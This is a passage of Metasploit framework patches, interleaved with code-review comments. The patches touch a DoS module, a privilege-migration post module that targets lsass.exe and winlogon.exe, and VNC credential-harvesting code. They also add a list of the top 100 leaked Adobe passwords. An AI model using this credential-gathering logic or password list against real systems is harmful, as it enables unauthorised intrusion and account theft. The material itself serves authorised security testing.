Gnesa', # Public disclosure/Proof of Concept 'William Webb <william_webb[at]rapid7.com>', # Metasploit ], 'References' => 
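Review bot: The rewritten guard `cli_port == 0 && !vulnerable?` only runs the vulnerability check when the port is exactly `0`, whereas the previous `unless cli_port || vulnerable?` ran it whenever no port was known. If an unset `XJenkinsCliPort` comes back from the datastore as `nil` (not shown in this hunk), `nil == 0` is false, `vulnerable?` is never called, and the module proceeds against a target it has not verified. `if cli_port.to_i == 0 && !vulnerable?` covers both the nil and the zero case. The body of `exploit` continues outside the hunk.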
@@ -88,9 +88,11 @@ class Metasploit4 < Msf::Exploit::Remote ) sock.put(p) - disconnect print_status("Packet sent!") - rescue ::Exception => ex - print_status("Exploit failed: #{ex.class}: #{ex.message}") + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex + print_status("Exploit failed: #{ex.class} #{ex.message}") + elog("#{ex.class} #{ex.message}\n#{ex.backtrace * "\n"}") + ensure + disconnect end end From 08a41b0a31e1e1ccb420270ee35bded5c9894cc0 Mon Sep 17 00:00:00 2001 From: Josh Hale <jhale85446@gmail.com> Date: Tue, 9 Feb 2016 21:22:50 -0600 Subject: [PATCH 41/71] Fix issue when target PID not owned by session --- modules/post/windows/manage/priv_migrate.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 04cba5d6c3..dcf5fbc9ec 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -53,6 +53,7 @@ class Metasploit3 < Msf::Post end # This function returns the first process id of a process with the name provided. + # It will make sure that the process has a visible user meaning that the session has rights to that process. # Note: "target_pid = session.sys.process[proc_name]" will not work when "include Msf::Post::Windows::Priv" is in the module. # # @return [Fixnum] the PID if one is found @@ -60,7 +61,9 @@ class Metasploit3 < Msf::Post def get_pid(proc_name) processes = client.sys.process.get_processes processes.each do |proc| - return proc['pid'] if proc['name'] == proc_name + if proc['name'] == proc_name + return proc['pid'] if proc['user'] != "" + end end return nil end From 4653c271672cd54c76d6db9e187ec466393447c2 Mon Sep 17 00:00:00 2001 
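Review bot: The new `rescue` branch in `ibm_tsm_dos.rb` still reports the failure through `print_status`, so a failed run is indistinguishable from progress output in the console and in logs. Use `print_error("Exploit failed: #{ex.class} #{ex.message}")` there. `ex.backtrace * "\n"` works, but `ex.backtrace.join("\n")` says what it does. The method this hunk belongs to starts outside the hunk.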
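Review bot: In `get_pid` (`priv_migrate.rb`), the test `proc['user'] != ""` lets a `nil` user through, so a process entry with no user value at all would still be returned, which is the case the added comment says is excluded. Whether `get_processes` can yield `nil` for that key is not visible in this hunk. `!proc['user'].to_s.empty?` handles both forms. The same comparison is carried unchanged into the later "Make fix easier to read" patch (`@@ -61,8 +61,8 @@`).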
From: Josh Hale <jhale85446@gmail.com> Date: Tue, 9 Feb 2016 21:24:40 -0600 Subject: [PATCH 42/71] Fix minor grammar error in description --- modules/post/windows/manage/priv_migrate.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index dcf5fbc9ec..1d26ad292d 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post It will do everything it can to migrate, including spawing a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, winlogon.exe, wininit.exe, lsm.exe, and lsass.exe. - If al these fail, it will fall back to User level migration. For sessions with User level rights: + If all these fail, it will fall back to User level migration. For sessions with User level rights: It will try to migrate to a user level process, if that fails it will attempt to spawn the process then migrate to it. It will attempt the User level processes in the following order: NAME (if specified), explorer.exe, then notepad.exe.}, From 8a3bc83c4de2fb94c100966e4794a591f04208a7 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 9 Feb 2016 21:24:25 -0600 Subject: [PATCH 43/71] Resolve #6553, remove unnecessary content-length header Rex will always generate a content-length header, so the module doesn't have to do this anymore. Resolve #6553 --- modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb | 1 - modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb | 1 - 2 files changed, 2 deletions(-) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 882ea4523a..5b04429e57 100644 
--- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -121,7 +121,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'max-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 17dc37c388..5a5e8f9e58 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -82,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'mag-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) From c67360f4362a3c3dd09476649942dd92c716b937 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Wed, 10 Feb 2016 09:44:01 -0600 Subject: [PATCH 44/71] Remove extraneous whitespace --- modules/exploits/linux/misc/jenkins_java_deserialize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index 22ac86212d..a715ed69ab 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) register_advanced_options([ - OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) + OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) ], self.class) end From 51604fa24a5943d9ae99ebd626d3a90093ed2dc7 Mon Sep 17 00:00:00 2001 
From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 10:59:11 -0600 Subject: [PATCH 45/71] made necessary inheritance changes --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 57fbd58292..c88a13acf7 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -5,10 +5,11 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit4 < Msf::Auxiliary Rank = GoodRanking include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos def initialize(info={}) super(update_info(info, @@ -72,7 +73,7 @@ class Metasploit4 < Msf::Exploit::Remote return pkt end - def exploit + def run ip = datastore['RHOST'] port = datastore['RPORT'] From 62dd82e65389bf28d01067c8a598fcae583c6c01 Mon Sep 17 00:00:00 2001 From: Josh Hale <jhale85446@gmail.com> Date: Wed, 10 Feb 2016 11:24:45 -0600 Subject: [PATCH 46/71] Make fix easier to read --- modules/post/windows/manage/priv_migrate.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 1d26ad292d..45d2de743d 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -61,8 +61,8 @@ class Metasploit3 < Msf::Post def get_pid(proc_name) processes = client.sys.process.get_processes processes.each do |proc| - if proc['name'] == proc_name - return proc['pid'] if proc['user'] != "" + if proc['name'] == proc_name && proc['user'] != "" + return proc['pid'] end end return nil From 72f5a33804fa266bf4b0d0de1dce07b8609582f0 Mon Sep 17 00:00:00 2001 
From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:34:05 -0600 Subject: [PATCH 47/71] addressed CI errors --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 17 +---------------- 1 file changed, 1 insertion(+), 16 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index c88a13acf7..eda0f99700 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -28,22 +28,7 @@ class Metasploit4 < Msf::Auxiliary [ ['URL', 'https://www.exploit-db.com/exploits/38979/'] ], - 'Payload' => - { - 'BadChars' => "\x00", - }, - 'DefaultOptions' => - { - 'DisablePayloadHandler' => 'true', - }, - 'Platform' => 'win', - 'Targets' => - [ - ['IBM Tivoli Storage Manager FastBack Server 5.5.4.2', {}], - ], - 'Privileged' => false, - 'DisclosureDate' => "Dec 15 2015", - 'DefaultTarget' => 0)) + 'DisclosureDate' => "Dec 15 2015")) register_options( [ From 4c6cb03548a4ba3a890f94565cc57888b4ec414c Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:40:21 -0600 Subject: [PATCH 48/71] more build errors --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index eda0f99700..3d1443e452 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -28,7 +28,9 @@ class Metasploit4 < Msf::Auxiliary [ ['URL', 'https://www.exploit-db.com/exploits/38979/'] ], - 'DisclosureDate' => "Dec 15 2015")) + 'DisclosureDate' => "Dec 15 2015", + 'DefaultOptions' => {} + )) register_options( [ From c874699b8239105f855a6f011d5e45a89c045590 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:45:09 -0600 Subject: [PATCH 49/71] removed ranking --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 1 - 1 file changed, 1 deletion(-) 
diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 3d1443e452..6d0fc435e0 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -6,7 +6,6 @@ require 'msf/core' class Metasploit4 < Msf::Auxiliary - Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos From 1637891ece730168dfb0d3e55d8c363c1a90c700 Mon Sep 17 00:00:00 2001 From: nk <nk@nikaiw.io> Date: Wed, 10 Feb 2016 20:30:41 +0100 Subject: [PATCH 50/71] Add check for the uninstall location in vnc post module --- modules/post/windows/gather/credentials/vnc.rb | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index a4488e672e..376de77802 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -108,6 +108,20 @@ class Metasploit3 < Msf::Post :port_variable => 'PortNumber='} end + #check uninstall key + begin + root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1") + open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) + vnclocation = open_key.query_value("InstallLocation").data + locations << {:name => 'UltraVNC', + :check_file => vnclocation + "\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} + rescue + # Registry value not found + end + locations << {:name => 'WinVNC3_HKLM', :check_reg => 'HKLM\\Software\\ORL\\WinVNC3', :pass_variable => 'Password', From 8118198628d739e86d543fca1b6a0ea0045a02ee Mon Sep 17 00:00:00 2001 From: Nicolas Devillers <nk@nikaiw.io> Date: Wed, 10 Feb 2016 22:47:51 +0100 Subject: [PATCH 51/71] Add vprint of the exception message --- modules/post/windows/gather/credentials/vnc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
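Review bot: The registry key opened with `open_key` in the new `begin` block of `vnc.rb` is never closed, so the handle stays open in the session whether or not `query_value` succeeds. Declare the variable before the `begin` and release it in an `ensure` clause, e.g. `ensure` followed by `open_key.close if open_key`. The enclosing method starts and ends outside the hunk.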
diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 376de77802..040a6a436c 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -118,8 +118,8 @@ class Metasploit3 < Msf::Post :pass_variable => 'passwd=', :viewonly_variable => 'passwd2=', :port_variable => 'PortNumber='} - rescue - # Registry value not found + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) end locations << {:name => 'WinVNC3_HKLM', From aeb1d80e0d703b1e5baa2d06ce841542c0f8bd5e Mon Sep 17 00:00:00 2001 From: Jay Turla <shipcodez@gmail.com> Date: Thu, 11 Feb 2016 08:55:45 +0800 Subject: [PATCH 52/71] Adding top 100 adobe passwords --- data/wordlists/adobe_top100_pass.txt | 100 +++++++++++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 data/wordlists/adobe_top100_pass.txt diff --git a/data/wordlists/adobe_top100_pass.txt b/data/wordlists/adobe_top100_pass.txt new file mode 100644 index 0000000000..f7d2a744be --- /dev/null +++ b/data/wordlists/adobe_top100_pass.txt 
@@ -0,0 +1,100 @@ +123456 +123456789 +password +adobe123 +12345678 +qwerty +1234567 +111111 +photoshop +123123 +1234567890 +000000 +abc123 +1234 +adobe1 +macromedia +azerty +iloveyou +aaaaaa +654321 +12345 +666666 +sunshine +123321 +letmein +monkey +asdfgh +password1 +shadow +princess +dragon +adobeadobe +daniel +computer +michael +121212 +charlie +master +superman +qwertyuiop +112233 +asdfasdf +jessica +1q2w3e4r +welcome +1qaz2wsx +987654321 +fdsa +753951 +chocolate +fuckyou +soccer +tigger +asdasd +thomas +asdfghjkl +internet +michelle +football +123qwe +zxcvbnm +dreamweaver +7777777 +maggie +qazwsx +baseball +jennifer +jordan +abcd1234 +trustno1 +buster +555555 +liverpool +abc +whatever +11111111 +102030 +123123123 +andrea +pepper +nicole +killer +abcdef +hannah +test +alexander +andrew +222222 +joshua +freedom +samsung +asdfghj +purple +ginger +123654 +matrix +secret +summer +1q2w3e +snoopy1 From 4ac7c5e298d76bc36f84d352434b581ec5dbe993 Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Thu, 11 Feb 2016 14:36:17 +1000 Subject: [PATCH 53/71] Updaed the gemspec to point to the new payloads gem --- metasploit-framework.gemspec | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 60143d3550..32bcb1cd36 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.23' + spec.add_runtime_dependency 'metasploit-payloads', '1.0.24' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 27ec6a861c3ce34c06c4921139ab464d59cf0af8 Mon Sep 17 00:00:00 2001 
From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 22:41:41 -0600 Subject: [PATCH 54/71] update gemfile.lock --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index caab021834..ea2654ff4a 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.23) + metasploit-payloads (= 1.0.24) metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.23) + metasploit-payloads (1.0.24) metasploit_data_models (1.2.10) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) From ff1cb4a2a46091c772b13d0715be00c9f994342e Mon Sep 17 00:00:00 2001 
From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 22:44:17 -0600 Subject: [PATCH 55/71] update payload sizes --- modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_https.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- 15 files changed, 15 insertions(+), 15 deletions(-) diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index fff36fc4d5..df54d255cd 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit4 - CachedSize = 26205 + CachedSize = 26778 include Msf::Payload::Single include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 395962145f..9d61027eca 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb 
@@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50226 + CachedSize = 51062 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 44369a42a9..f720e147fa 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50190 + CachedSize = 51026 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index efdecac0bc..4e02d4ecf1 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50190 + CachedSize = 51026 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 7988da15eb..67d4cbfe69 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50146 + CachedSize = 50978 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 35cca34308..8f59094b79 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb 
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index cf8c6f0fd1..488b28e773 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 958531 + CachedSize = 959043 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 32fe451235..1782e416cb 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 958531 + CachedSize = 959043 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 831e479db2..9b299268cf 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index f84eac31bd..33c1f06b81 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb 
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit3 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 100760fd6d..8cdbcd13e4 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 7d493b49e9..43a55d8c01 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 951dad4425..5207a0b0d4 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index 519e5ed6d3..ea5cab3cc8 100644 
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 7ed67c7a06..5dddb7f1c8 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows From ed5cf821b2dd21200791fdc9c93acf41300e6b90 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 23:21:20 -0600 Subject: [PATCH 56/71] bump payloads to 1.1.0 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index ea2654ff4a..32690ca571 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.24) + metasploit-payloads (= 1.1.0) metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.24) + metasploit-payloads (1.1.0) metasploit_data_models (1.2.10) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 32bcb1cd36..0aba1e8d59 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.24' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.0' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From e738b5922d74a823687bac558fb2b54ca47f08a9 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Tue, 12 Jan 2016 08:13:29 +0000 Subject: [PATCH 57/71] fix play_youtube to work on Android --- modules/post/multi/manage/play_youtube.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 0c5d85ce3d..3d44dba25c 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -94,6 +94,19 @@ class Metasploit3 < Msf::Post true end + # + # The Android version is launched via an Intent + # + def android_start_video(id) + intenturl = "intent://youtube.com/watch?v=#{id}&autoplay=1#Intent;scheme=http;action=android.intent.action.VIEW;end" + begin + session.android.activity_start(intenturl) + rescue Rex::Post::Meterpreter::RequestError => e + return false + end + true + end + def start_video(id) case session.platform when /osx/ @@ -102,6 +115,8 @@ class Metasploit3 < Msf::Post win_start_video(id) when /linux/ linux_start_video(id) + when /android/ + android_start_video(id) end end From 31210938984ee4543a7ccbc3959df1106886c389 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 11 Feb 2016 22:04:05 -0600 Subject: [PATCH 58/71] Update metadata, plus other minor changes --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 27 ++++++++++------------- 1 file changed, 12 insertions(+), 15 deletions(-) 
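Review bot: In `android_start_video` (modules/post/multi/manage/play_youtube.rb, first hunk) the `rescue Rex::Post::Meterpreter::RequestError => e` clause binds `e` and never uses it, so a failed `activity_start` returns false with no record of why. Either drop the binding or report the reason before returning, e.g. `vprint_error("activity_start failed: #{e.message}")`. `id` is also interpolated into the intent string as-is; checking it against the expected video-id format first (for example `id =~ /\A[\w-]+\z/`) would keep characters such as `;` or `#` from changing how the string is parsed. The sibling `*_start_video` methods are outside the hunk, so whether they log failures is not visible here.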
